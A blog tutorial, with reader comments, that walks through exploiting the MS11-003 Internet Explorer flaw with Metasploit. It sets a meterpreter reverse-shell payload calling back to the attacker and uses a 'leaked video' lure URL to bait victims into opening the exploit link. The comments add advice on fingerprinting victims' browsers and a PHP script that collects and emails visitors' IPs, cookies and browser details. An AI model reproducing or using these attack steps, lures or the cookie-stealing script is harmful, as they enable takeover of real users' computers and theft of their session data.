• 27,004
  • +1,029
  • 3,074
Exploiting MS11_003 Internet Explorer Vulnerability Using Metasploit Framework

Exploiting MS11_003 Internet Explorer Vulnerability Using Metasploit Framework

Bookmark

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5

Victim O.S : Windows 7 SP 1

Victim Browser : Internet Explorer 8

Microsoft Internet Explorer have another vulnerability after so many vulnerability have found by security researcher. The MS11_003 vulnerability actually found at February 08, 2011 according to Microsoft security bulletin.

In this tutorial we will try to exploit that vulnerability MS11_003 using metasploit module ms11_003_ie_css_import. According to metasploit website :

This module exploits a memory corruption vulnerability within Microsoft\’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.

Lets prepare the attack! :

Requirement :

1. Metasploit Framework (website)

2. Operating System (I’m use Backtrack 5 in this tutorial)

3. ms11_003_ie_css_import exploit — download from mediafire.com

Mediafire.com

Step By Step :

1. For the first step, you need to update your metasploit framework to the latest version by running msfupdate command. If you didn’t have internet connection to upload, you can download the exploit above and copy to /pentest/exploits/framework3/modules/exploits/windows/browser.

2. The next step we need to use the exploit module ms11_003_ie_css_import by using use exploit/windows/browser/ms11_003_ie_css_import command. In this tutorial I’m using the meterpreter reverse_tcp payload, but you can change another payload to suit your mood.

Exploiting MS11_003 Internet Explorer Vulnerability Using Metasploit Framework

3. After finished set up exploit and payload, we need to set up and configure the options. In this picture below I’m configuring the options that needed to perform an attack according to my thoughts.

Exploiting MS11_003 Internet Explorer Vulnerability Using Metasploit Framework

Legends :

set srvhost 192.168.8.93 --> set up our server address change the ip to your IP.

set srvport 80 --> set server port to handle request from victim. port 80 is the best social engineering.

set uripath avril-video-leaked.avi --> make the victim curious about the link you've given so they want to open it.

set lhost 192.168.8.93 --> set up the IP address that will use to connect back when victim successfully exploited.

set lport 443 --> port that will be used by our payload when exploit successfully perform.

exploit --> perform the exploit to generate link that will be used in our attack

http://192.168.8.93/avril-video-leaked.avi --> This is the URL that will be given to victim.

4. When victim open the malicious link we’ve given, here’s the screenshot in attacker console.

Exploiting MS11_003 Internet Explorer Vulnerability Using Metasploit Framework

The print screen above tell us that attack has performed successfully and now act as notepad.exe process on victim computer.

5. To make sure are we got active sessions from victim or not, do sessions -l command to view active sessions.

Exploiting MS11_003 Internet Explorer Vulnerability Using Metasploit Framework

6. Looks like great! we’ve get an active sessions, let’s interract with that session by using sessions -i 1 and doing something.

Exploiting MS11_003 Internet Explorer Vulnerability Using Metasploit Framework

PWNED!

Countermeasure :

1. Always update your browser to the latest version

2. Don’t open link that you didn’t know

hope you found it useful 🙂

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • Pingback: How to Share Folder in Backtrack 5 R1 to Make Accessible in Windows | Vishnu Valentino Hacking Tutorial, Tips and Trick()

  • hello..your site is good..i like your tutorials. Please help me with a doubt.I run BT5 on virtual box and use windows 7 and XP VM's for pentesting….while using a browser based client side exploit,metasploit generates a link for us which the target will hav to run in his browser so that the exploit runs and we get a session…my question is that the link that metasploit generates is of the form 192.168.56.101:8080 or 10.0.2.15 … These two address belong to the local network I hope… Can we target any user on the internet using these browser based exploit? how can we generate a global link which can be sent to any target?

  • joand

    Hi thanks forwarding tuts ..brower based attack is good but i try to do something else i might be thinking wrong . what i try to do is WAN ip traffic —>forward to–>Lan host pc .. then perform MITM attack
    trying to do same mitm over wan ip as we do in lan network
    i think iptables here could do some magic .
    so much confusion lol ))

  • Baldassarre

    Before I meant what should I write on my HTML page to find the vulnerabilities of the victim that will click the link that i will send? How can i find which version of internet Explorer or whatever browser victim uses? I ask these things because I think that I need this kind of informations for this type of attack. If am i wrong correct me….

    • v4L

      #Baldassarre
      If you familiar with server side scripting(e.g : php), you can use HTTP_USER_AGENT
      check the type and version of the user browser, and if match, redirect it to exploit server.

  • dean

    How can I find the vulnerabilities of the victim's computer with a malicious link? What I should write in my html page? Please give an answer.

    • v4L

      #dean
      Maybe you can view my last comment to Baldassare

  • Baldassarre

    Thanks i 've just tried and now i know how to view the victim's user agent but what about adobe reader, flash player, Windows media player versions? I can't find anywhere what should i write in the php script to find their versions…
    I would like to ask you another question how can redirect to the correct exploit sever? What i supposed to do? 

    • v4L

      #Baldassarre
      I can’t give you answer for it, you can Google for it

  • Baldassarre

     
    This is the script of php that I have found.  I would like to found more information about the victim's system but I don't know what I should add in this script.
     
    <?php
    $ip = $_SERVER['REMOTE_ADDR'];
    $userAgent = $_SERVER['HTTP_USER_AGENT'];
    $accept=$_SERVER['HTTP_ACCEPT_LANGUAGE'];
    $cookie = $_GET['c'];
    $myemail = "aaranan_12@gmail.com";
    $today = date("l, F j, Y, g:i a") ;
    $subject = "Indirizzo ip" ;
    $message = "Eccoti l'indirizzo ip, con tanto di data e ora dell'invio:
    Ip: $ip
    Cookie: $cookie
    Browser: $userAgent
    Lingua: $accept
    Url: $base
    Giorno & Ora : $today \n
    ";
    $from = "From: $myemail\r\n";
    mail($myemail, $subject, $message, $from);
    ?>
     

  • Baldassarre

    I've already tried and I didn't find anything about it. Thanks anyway.

  • Pingback: How to Port Forward Browser Exploit From Router to Your Exploit Server | Vishnu Valentino Ethical Hacking Tutorial, Security Tips and Trick()

  • Boris

    Hey amazing tutorial, but when i tried to download IE 8(i have IE 9 not a default browser) it says its not supported on this system( WIN 7 SP1) Any idea?

    • v4L

      #boris
      it only works on IE8

      • Boris

        My bad, i mean i tried to install IE8, but its says its not supported(Win 7). I dont know wheres the problem or its just cause its Internet Explorer. Thank you